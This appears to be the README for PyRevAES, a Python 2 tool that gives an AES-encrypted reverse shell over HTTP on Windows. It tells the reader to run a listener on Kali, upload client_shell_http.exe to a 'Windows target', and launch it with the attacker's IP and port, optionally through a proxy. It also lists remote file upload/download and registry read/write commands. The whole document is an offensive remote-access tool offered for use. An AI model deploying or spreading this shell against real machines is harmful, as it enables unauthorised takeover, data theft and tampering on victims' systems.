A Windows Reverse Shell using HTTP methods with 256-bit AES encryption written in python2.
If I get some time, I will convert this to a python3 project.
git clone https://github.com/simon-revit/PyRevAES.git
cd PyRevAES/
pip2 install -r requirements.txt
python2 server_shell_http.py
- choose port
80
- Other ports may work, but it works best with port80
- Run server_shell_http.py from kali (and choose port 80)
sudo python2 server_shell_http.py
- Upload client_shell_http.exe to Windows target
- Run the following command on the target for a reverse shell without proxy:
C:\client_shell_http.exe <kali_ip> 80
- Run the following command for a reverse shell with proxy:
C:\client_shell_http.exe <kali_ip> <kali_port> <proxy_address> <Proxy_port>
client_shell_http.py
- If you want to create your own executable or run directly from python, code is available.
TCP_proxy_online.py
- TCP proxy from https://stackoverflow.com/questions/32468270/tcp-proxy-using-python Purely the work of voorloop. You might need to modfy lines 16 and 94 to modify the forwarded reverseshell/port and the proxy port, respectively.
get-pip.py
To install pip for python2 (after deprecation). Reference: https://bootstrap.pypa.io/
NB: If changing the secret
AES encryption key, ensure you change both the client and server scripts to match.
upload [filename]
download [filename]
=> Need to rename file after download.
winreg
=> displays help message
WINREG HELP
Usage set: winreg,set,[HKEY],"[REG_PATH]",[REG_NAME],[value]
Example: winreg,set,HKEY_CURRENT_USER,control panel\mouse,mousesensitivity,7
or
Usage read: winreg,read,[HKEY],[REG_PATH],[REG_NAME]
Example: winreg,read,HKEY_CURRENT_USER,control panel\mouse,mousesensitivity
If there are issues with pip2 installation (due to deprecation) refer to this https://bootstrap.pypa.io/ to get pip working again for python2.
If there are issues with pycrypto, install the following:
sudo apt install build-essential libssl-dev libffi-dev python-dev
If still having issues, try running everything using sudo.
- Logo made with courtesy of https://www.freelogodesign.org/